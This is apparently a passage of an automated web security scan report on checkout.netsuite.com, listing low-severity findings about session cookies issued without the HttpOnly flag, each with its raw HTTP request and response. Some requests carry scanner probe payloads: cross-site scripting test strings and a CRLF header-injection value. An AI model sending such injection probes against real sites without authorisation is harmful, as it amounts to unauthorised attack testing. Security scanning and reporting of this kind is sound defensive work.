Path:   /Netsparker00c59262f08b40d59cb0f0d3fa4e17ed.nl

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Netsparker00c59262f08b40d59cb0f0d3fa4e17ed.nl HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
Cookie: JSESSIONID=dr9LN1Gcsnv0hQn9pSF9dZtY69V5GT6wWLx5pbn5zqyTN5K0By5hSnyCLpkp16zsn8jTQzcvVTNZSwMD4mG6WZmpmLChGK6FncvhBpQv6KGffqpM2fHyGlYVz2GpQM2Y!-979559123; NLVisitorId=rcHW8495AYoCDqLY; NLShopperId=rcHW8495AXICDie_; NS_VER=2011.1.0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 206 Partial Content
Date: Mon, 25 Apr 2011 15:09:26 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -2144347290:616363742D6A6176613032302E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=L0xGN1TCcVCQPS8pHhg9qBGd76gpyCfS7FnHbzfnFl2LQNGjJvrzfh6fNyfBxr6h2LllvDnWDV1VRT3fh8GLJQYNFyskhxdG51gGXN5XF7N0GMrVt0mxL6vQyQSnT8pW!-979559123; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 2024

<html><head><title>Notice</title>
<meta http-equiv='Content-Type' content='text/html; charset=UTF-8'>
<link rel='stylesheet' href='/core/styles/pagestyles.nl?ct=-2&bglt=F2F4F6&bgmd=EDF1F7&bgdk=737A82&
...[SNIP]...

16.3. https://checkout.netsuite.com/Netsparker3f4e2bee979c4108be6e7c378faf29fa.nl  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://checkout.netsuite.com
Path:   /Netsparker3f4e2bee979c4108be6e7c378faf29fa.nl

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Netsparker3f4e2bee979c4108be6e7c378faf29fa.nl HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
Cookie: JSESSIONID=dr9LN1Gcsnv0hQn9pSF9dZtY69V5GT6wWLx5pbn5zqyTN5K0By5hSnyCLpkp16zsn8jTQzcvVTNZSwMD4mG6WZmpmLChGK6FncvhBpQv6KGffqpM2fHyGlYVz2GpQM2Y!-979559123; NLVisitorId=rcHW8495AYoCDqLY; NLShopperId=rcHW8495AXICDie_; NS_VER=2011.1.0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 206 Partial Content
Date: Mon, 25 Apr 2011 15:07:48 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: 2000683563:616363742D6A6176613032302E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=2RW7N1TCBHr6mQJSv4MJrzV9rnyz359DTygvK7qTzvf13vCc2x2x2JXm5QLhrNbJJQcTCgFLGHhsGp0VQ7FwRJ4b5TpDvcFrLL1Jh18S7vw1h5R7dYbgwShCL6v1QX0C!-979559123; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 2024

<html><head><title>Notice</title>
<meta http-equiv='Content-Type' content='text/html; charset=UTF-8'>
<link rel='stylesheet' href='/core/styles/pagestyles.nl?ct=-2&bglt=F2F4F6&bgmd=EDF1F7&bgdk=737A82&
...[SNIP]...

16.4. https://checkout.netsuite.com/Netsparkerd83f087f78ee474db97e8aec33de63c2.nl  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://checkout.netsuite.com
Path:   /Netsparkerd83f087f78ee474db97e8aec33de63c2.nl

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Netsparkerd83f087f78ee474db97e8aec33de63c2.nl HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
Cookie: JSESSIONID=dr9LN1Gcsnv0hQn9pSF9dZtY69V5GT6wWLx5pbn5zqyTN5K0By5hSnyCLpkp16zsn8jTQzcvVTNZSwMD4mG6WZmpmLChGK6FncvhBpQv6KGffqpM2fHyGlYVz2GpQM2Y!-979559123; NLVisitorId=rcHW8495AYoCDqLY; NLShopperId=rcHW8495AXICDie_; NS_VER=2011.1.0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 206 Partial Content
Date: Mon, 25 Apr 2011 15:10:47 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -110553779:616363742D6A6176613032302E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=6gtrN1TV8C9xXWGTLVWNMvDTBLMyV755hCYflZPh1YC9G3WhlHnpqmr03yRfTfPYQpX2lCD12TQ2p4sh2qzn2CRFHBYp2ypxXQ0Ts2HJkxK7TM4GT0WGNXlr2vhsWDqh!-979559123; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 2024

<html><head><title>Notice</title>
<meta http-equiv='Content-Type' content='text/html; charset=UTF-8'>
<link rel='stylesheet' href='/core/styles/pagestyles.nl?ct=-2&bglt=F2F4F6&bgmd=EDF1F7&bgdk=737A82&
...[SNIP]...

16.5. https://checkout.netsuite.com/core/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://checkout.netsuite.com
Path:   /core/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /core/?nsextt=%00%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker(0x000013)%3C%2Fscript%3E HTTP/1.1
Referer: https://checkout.netsuite.com/core/styles/pagestyles.nl?ct=-2&bglt=F2F4F6&bgmd=EDF1F7&bgdk=737A82&bgon=5C7499&bgoff=AFB5BF&bgbar=5C7499&tasktitletext=E4EAF4&crumbtext=C4C8CF&headertext=B5C1D5&ontab=FFFFFF&offtab=000000&text=000000&link=000000&bgbody=FFFFFF&bghead=FFFFFF&portlet=C0CAD9&portletlabel=000000&bgbutton=FFE599&bgrequiredfld=FFFFE5&font=Verdana%2CHelvetica%2Csans-serif&size_site_content=9pt&size_site_title=9pt&size=1.0&nlinputstyles=T&NS_VER=2011.1.0&3
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
Cookie: JSESSIONID=31PwN1GWQvkMGP2pxGGpgHN2m48g811ybT9HCcv4R2jvLCt8R9y21ywBzs7v4v6KSnRPhyDpZb218XYJ9jkhnLpJpr8m7pxCsyyXnPNz1ChxGGXdMyLzThLVm6jGBpVG!1490567172; NLVisitorId=rcHW8495AYoCDqLY; NLShopperId=rcHW8495AXICDie_; NS_VER=2011.1.0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:27:05 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: 333241087:616363742D6A6176613031312E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=hWd4N1GZGdsflwhjP8VdVGSnB6r2GzJ3SBh92hgS8gqlwWGNvByZJhtmP17wL8Hj9JwLc1dn5gjrrtXLMVZXhDnw7vvQwTP4mMBtPt3ds55G4vp4gF1Zr97r3DHpyLCR!-1220802186; path=/
Set-Cookie: NLShopperId=rcHW8495AXICDie_; domain=checkout.netsuite.com; expires=Monday, 02-May-2011 14:27:05 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 2650


<html>
<head>
<title>Checkout</title>
<link rel='stylesheet' href='/core/styles/pagestyles.nl?ct=-2&bglt=F2F4F6&bgmd=EDF1F7&bgdk=737A82&bgon=5C7499&bgoff=AFB5BF&bgbar=5C7499&tasktitletext=E4EAF4&crum
...[SNIP]...

16.6. https://checkout.netsuite.com/core/media/Netsparker2f675cb9691f4d6caba2349e5f5a7d63.nl  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://checkout.netsuite.com
Path:   /core/media/Netsparker2f675cb9691f4d6caba2349e5f5a7d63.nl

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /core/media/Netsparker2f675cb9691f4d6caba2349e5f5a7d63.nl HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
Cookie: JSESSIONID=dr9LN1Gcsnv0hQn9pSF9dZtY69V5GT6wWLx5pbn5zqyTN5K0By5hSnyCLpkp16zsn8jTQzcvVTNZSwMD4mG6WZmpmLChGK6FncvhBpQv6KGffqpM2fHyGlYVz2GpQM2Y!-979559123; NLVisitorId=rcHW8495AYoCDqLY; NLShopperId=rcHW8495AXICDie_; NS_VER=2011.1.0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 206 Partial Content
Date: Mon, 25 Apr 2011 15:08:12 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -368749109:616363742D6A6176613032302E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=9pncN1TcCnWLkfJJbLpSq1RR7PL6tyTTw0hR5QMhqLwnSDCyGTFJxJhYwyJYDpG2wJdSpSJy1FLV6lXT1thXwK1jrhJvlSP8KCMDHGZd8DVZ2nQZC2pLR3HTpPgQDCQp!-979559123; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 2024

<html><head><title>Notice</title>
<meta http-equiv='Content-Type' content='text/html; charset=UTF-8'>
<link rel='stylesheet' href='/core/styles/pagestyles.nl?ct=-2&bglt=F2F4F6&bgmd=EDF1F7&bgdk=737A82&
...[SNIP]...

16.7. https://checkout.netsuite.com/core/media/Netsparker3966cc21ff2a48c3b65f2ea6026a480e.nl  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://checkout.netsuite.com
Path:   /core/media/Netsparker3966cc21ff2a48c3b65f2ea6026a480e.nl

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /core/media/Netsparker3966cc21ff2a48c3b65f2ea6026a480e.nl HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
Cookie: JSESSIONID=dr9LN1Gcsnv0hQn9pSF9dZtY69V5GT6wWLx5pbn5zqyTN5K0By5hSnyCLpkp16zsn8jTQzcvVTNZSwMD4mG6WZmpmLChGK6FncvhBpQv6KGffqpM2fHyGlYVz2GpQM2Y!-979559123; NLVisitorId=rcHW8495AYoCDqLY; NLShopperId=rcHW8495AXICDie_; NS_VER=2011.1.0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 206 Partial Content
Date: Mon, 25 Apr 2011 15:07:31 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -812652053:616363742D6A6176613032302E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=JwDGN1TRX3qFJhPv0tBSnhLkTmpW34vhDRvgTkwqLXK4SnvMG3VM1xdGYpsFmKLXPJGL5yG5Lk8PK7KS4HKnfNNzcdJH2J9GRhFDsWdQlvhZyXNFZGnBbnGLKb2GLgXj!-979559123; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 2024

<html><head><title>Notice</title>
<meta http-equiv='Content-Type' content='text/html; charset=UTF-8'>
<link rel='stylesheet' href='/core/styles/pagestyles.nl?ct=-2&bglt=F2F4F6&bgmd=EDF1F7&bgdk=737A82&
...[SNIP]...

16.8. https://checkout.netsuite.com/core/media/Netsparkere27d76ce16c84ccb9270fd25e2ba9535.nl  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://checkout.netsuite.com
Path:   /core/media/Netsparkere27d76ce16c84ccb9270fd25e2ba9535.nl

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /core/media/Netsparkere27d76ce16c84ccb9270fd25e2ba9535.nl HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
Cookie: JSESSIONID=dr9LN1Gcsnv0hQn9pSF9dZtY69V5GT6wWLx5pbn5zqyTN5K0By5hSnyCLpkp16zsn8jTQzcvVTNZSwMD4mG6WZmpmLChGK6FncvhBpQv6KGffqpM2fHyGlYVz2GpQM2Y!-979559123; NLVisitorId=rcHW8495AYoCDqLY; NLShopperId=rcHW8495AXICDie_; NS_VER=2011.1.0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 206 Partial Content
Date: Mon, 25 Apr 2011 15:09:35 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -110558500:616363742D6A6176613032302E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=C9RcN1TT8snZLj3J8hCcFmJpQ654HjYQZ4F5LCvBvTZ29f1ZnThL0wQpBFWf522QQvf7TN89dBTvLfjsSzfJD1yGKG3D0xhy3Ryv7M0c6rzkzZB1SlWMFLwchzvhwnV2!-979559123; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 2024

<html><head><title>Notice</title>
<meta http-equiv='Content-Type' content='text/html; charset=UTF-8'>
<link rel='stylesheet' href='/core/styles/pagestyles.nl?ct=-2&bglt=F2F4F6&bgmd=EDF1F7&bgdk=737A82&
...[SNIP]...

16.9. https://checkout.netsuite.com/core/styles/Netsparker5d6e89379b044629864a1acadeba968b.nl  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://checkout.netsuite.com
Path:   /core/styles/Netsparker5d6e89379b044629864a1acadeba968b.nl

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /core/styles/Netsparker5d6e89379b044629864a1acadeba968b.nl HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
Cookie: JSESSIONID=dr9LN1Gcsnv0hQn9pSF9dZtY69V5GT6wWLx5pbn5zqyTN5K0By5hSnyCLpkp16zsn8jTQzcvVTNZSwMD4mG6WZmpmLChGK6FncvhBpQv6KGffqpM2fHyGlYVz2GpQM2Y!-979559123; NLVisitorId=rcHW8495AYoCDqLY; NLShopperId=rcHW8495AYQCDmZk; NS_VER=2011.1.0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 206 Partial Content
Date: Mon, 25 Apr 2011 15:04:40 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -110576631:616363742D6A6176613032302E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=MKB8N1NDfnQgHZLLbYDLh4z8yFybC5QDpN14nhTHyDDLBGWlh1d9yCB5hmlfvFCpH1Y1YByvTLKmHv2s5tFSs0FxbnfmZJM1Zpdqds57MzgTGCMyNN5C3zzpW0WtRYhQ!-979559123; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 2024

<html><head><title>Notice</title>
<meta http-equiv='Content-Type' content='text/html; charset=UTF-8'>
<link rel='stylesheet' href='/core/styles/pagestyles.nl?ct=-2&bglt=F2F4F6&bgmd=EDF1F7&bgdk=737A82&
...[SNIP]...

16.10. https://checkout.netsuite.com/core/styles/Netsparkera2b9f56d99bc43aa9ec216d3c99aa80b.nl  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://checkout.netsuite.com
Path:   /core/styles/Netsparkera2b9f56d99bc43aa9ec216d3c99aa80b.nl

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /core/styles/Netsparkera2b9f56d99bc43aa9ec216d3c99aa80b.nl HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
Cookie: JSESSIONID=dr9LN1Gcsnv0hQn9pSF9dZtY69V5GT6wWLx5pbn5zqyTN5K0By5hSnyCLpkp16zsn8jTQzcvVTNZSwMD4mG6WZmpmLChGK6FncvhBpQv6KGffqpM2fHyGlYVz2GpQM2Y!-979559123; NLVisitorId=rcHW8495AYoCDqLY; NLShopperId=rcHW8495AXICDie_; NS_VER=2011.1.0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 206 Partial Content
Date: Mon, 25 Apr 2011 15:08:36 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: 1112884952:616363742D6A6176613032302E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=kpy0N1TTsKDkPgBGQZchFwhNP2xxQDtJvfwQVvtynWwgQLL0vwPLg1KTvflJQHp8yCnphBG9nfKqGrnvy0Cy2pxD6Br4LW1B7KYyndJyk1mBF7whWgydLzFw85SwJwvl!-979559123; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 2024

<html><head><title>Notice</title>
<meta http-equiv='Content-Type' content='text/html; charset=UTF-8'>
<link rel='stylesheet' href='/core/styles/pagestyles.nl?ct=-2&bglt=F2F4F6&bgmd=EDF1F7&bgdk=737A82&
...[SNIP]...

16.11. https://checkout.netsuite.com/core/styles/Netsparkerb8e355f2184b49a497b4b297f62d93f9.nl  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://checkout.netsuite.com
Path:   /core/styles/Netsparkerb8e355f2184b49a497b4b297f62d93f9.nl

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /core/styles/Netsparkerb8e355f2184b49a497b4b297f62d93f9.nl HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
Cookie: JSESSIONID=dr9LN1Gcsnv0hQn9pSF9dZtY69V5GT6wWLx5pbn5zqyTN5K0By5hSnyCLpkp16zsn8jTQzcvVTNZSwMD4mG6WZmpmLChGK6FncvhBpQv6KGffqpM2fHyGlYVz2GpQM2Y!-979559123; NLVisitorId=rcHW8495AYoCDqLY; NLShopperId=rcHW8495AXICDie_; NS_VER=2011.1.0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 206 Partial Content
Date: Mon, 25 Apr 2011 15:07:38 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -2144353504:616363742D6A6176613032302E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=pmQ9N1TXzfvBjH2mhF3Q1jKgWhcfCCjndsRvYYL3lv5kb0VQfGTyhhQQQbjmYcLvyCNhp8Kf20GD1QlTR1F2jfcsTn5Lr1hW0SLCmSrGVSrcZnXL5rhglQsqv9ZFVhG2!-979559123; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 2024

<html><head><title>Notice</title>
<meta http-equiv='Content-Type' content='text/html; charset=UTF-8'>
<link rel='stylesheet' href='/core/styles/pagestyles.nl?ct=-2&bglt=F2F4F6&bgmd=EDF1F7&bgdk=737A82&
...[SNIP]...

16.12. https://checkout.netsuite.com/core/styles/pagestyles.nl  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://checkout.netsuite.com
Path:   /core/styles/pagestyles.nl

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /core/styles/pagestyles.nl?ct=http://example.com/%3f%0D%0Ans:%20netsparker056650=vuln&bglt=F2F4F6&bgmd=EDF1F7&bgdk=737A82&bgon=5C7499&bgoff=AFB5BF&bgbar=5C7499&tasktitletext=E4EAF4&crumbtext=C4C8CF&headertext=B5C1D5&ontab=FFFFFF&offtab=000000&text=000000&link=000000&bgbody=FFFFFF&bghead=FFFFFF&portlet=C0CAD9&portletlabel=000000&bgbutton=FFE599&bgrequiredfld=FFFFE5&font=Verdana%2CHelvetica%2Csans-serif&size_site_content=9pt&size_site_title=9pt&size=1.0&nlinputstyles=T&NS_VER=2011.1.0&3=3 HTTP/1.1
Referer: https://checkout.netsuite.com/s.nl?c=438708&sc=4&whence=&n=1&ext=T
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
Cookie: JSESSIONID=dr9LN1Gcsnv0hQn9pSF9dZtY69V5GT6wWLx5pbn5zqyTN5K0By5hSnyCLpkp16zsn8jTQzcvVTNZSwMD4mG6WZmpmLChGK6FncvhBpQv6KGffqpM2fHyGlYVz2GpQM2Y!-979559123; NLVisitorId=rcHW8495AYoCDqLY; NLShopperId=rcHW8495AXICDie_; NS_VER=2010.2.0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:27:02 GMT
Server: Apache
Expires: Tue, 26 Apr 2011 06:15:02 GMT
Last-Modified: Mon, 25 Apr 2011 14:27:02 GMT
NS_RTIMER_COMPOSITE: -1134201633:616363742D6A6176613036312E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=tXQJN1GWSQGJhxgnQLglP9K2nC3JgRj49hbDh6pTpzfsTnRKQQ1Dk0D1X5PfwJGyCLhxyJQfpJxpGHzCJV4sK1VsMCzpln6GNyht1gnPJpDGpHp3rdQFqyYz8rzCzbJN!-1435542349; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/css; charset=UTF-8
Content-Length: 67958

.iArrowLeft, .iArrowRight { display:inline-block; height:15px; width:16px; margin: 0 2px; background: url(/images/chiles/dashboard_icons.png) no-repeat; text-decoration: none; zoom:1}
.iArrowLeft { ma
...[SNIP]...

16.13. https://checkout.netsuite.com/pages/portal/css/main.css  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://checkout.netsuite.com
Path:   /pages/portal/css/main.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/portal/css/main.css?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00007E)%3C/script%3E HTTP/1.1
Referer: https://checkout.netsuite.com/pages/portal/page_not_found.jsp?internal=F
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
Cookie: JSESSIONID=fspzN1GhTphyBQvLpyGdlJdh6BL8whyTwq2X78f8hxRthNWT2Z3jy4GGPSzLlnVZdyGJQxSTzT2hfvnn6y9XwhnznRTRZbMw6QGzXJcyQ2jBFp97np87tTDKTCTHXpxD!-1598522165; NLVisitorId=rcHW8495AYoCDqLY; NLShopperId=rcHW8495AXICDie_; NS_VER=2011.1.0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:12:54 GMT
Server: Apache
Accept-Ranges: bytes
Last-Modified: Sat, 23 Apr 2011 00:28:30 GMT
NS_RTIMER_COMPOSITE: 225122148:616363742D6A6176613031362E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=2ln9N1PQC1pBlnRWMG11FTSzZ6Q7LFs2lFNbJYnZ9dvJs5NzSj9RQKLJB0jQbCcLrsWnHTJhh0vdnB0mgnkmGyrxYmLv5WCDzrjppnpZy6JLTGMDpZ7c9R9LvKTjTMqt!-1598522165; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/css
Content-Length: 2044

td, p        {
   font-family: Verdana, Arial, Helvetica, sans-serif;
   color: #333333;
   font-size: 11px;
}

.blueSubhead        {
   font-family: Verdana, Arial, Helvetica, sans-serif;
   color: #004584;
   font-weight:
...[SNIP]...

16.14. https://checkout.netsuite.com/pages/portal/page_not_found.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://checkout.netsuite.com
Path:   /pages/portal/page_not_found.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/portal/page_not_found.jsp?internal=F HTTP/1.1
Referer: https://checkout.netsuite.com/s.nl?c=438708&sc=4&whence=&n=1&ext=T
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
Cookie: JSESSIONID=dr9LN1Gcsnv0hQn9pSF9dZtY69V5GT6wWLx5pbn5zqyTN5K0By5hSnyCLpkp16zsn8jTQzcvVTNZSwMD4mG6WZmpmLChGK6FncvhBpQv6KGffqpM2fHyGlYVz2GpQM2Y!-979559123; NLVisitorId=rcHW8495AYoCDqLY; NLShopperId=rcHW8495AXICDie_; NS_VER=2010.2.0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:26:59 GMT
Server: Apache
NS_RTIMER_COMPOSITE: -690374290:616363742D6A6176613038362E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=0K8PN1GJqgGn0JkkHrzfLxHcVjNhkHczxJ5J34JfcXdnJGwzK09nybznnTnCvp8D498vLcRWvvh2CF7BJVDVQrVtHmgnlt8tVTVJzTsP1cDqMsf7gd27xTwt1BJB9BL4!-1927254259; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 11320


<html><head><title>NetSuite | Page Not Found</title>
<meta name="robots" content="noindex,nofollow">
<link rel="STYLESHEET" type="text/css" href="/pages/portal/css/main.css">
</head>
<body bgcolor
...[SNIP]...

16.15. https://checkout.netsuite.com/s.nl  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://checkout.netsuite.com
Path:   /s.nl

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /s.nl?c=438708&sc=4&whence=&n=1&ext=T HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:26:36 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -1700514546:616363742D6A6176613031382E7376616C652E6E65746C65646765722E636F6D:80
